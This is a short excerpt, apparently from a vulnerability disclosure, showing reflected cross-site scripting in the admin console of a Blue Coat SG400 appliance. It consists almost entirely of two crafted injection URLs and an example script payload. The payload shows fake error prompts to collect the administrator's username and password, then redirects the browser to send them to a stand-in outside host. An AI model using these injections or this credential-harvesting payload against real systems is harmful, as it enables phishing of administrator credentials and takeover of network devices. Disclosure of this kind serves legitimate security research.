https://www.example.com:8082/Secure/Local/console/install_upload_action/crl_format?name="<script>alert("XSS")</script>%00

https://www.example.com:8082/Secure/Local/console/install_upload_from_file.htm?file=<script>alert("XSS")</script><!--

Example Payload:
<script>
do {
    a=prompt("Blue Coat SG400: an error has occurred\nPlease enter your 
USERNAME","");
    b=prompt("Blue Coat SG400: an error has occurred\nPlease enter your 
PASSWORD","");
}while(a==null || b==null || a=="" || b=="");

alert("owned!:"+a+"/"+b);window.location="http://www.example2.com/?u="+a+"&p="+b
</script><!--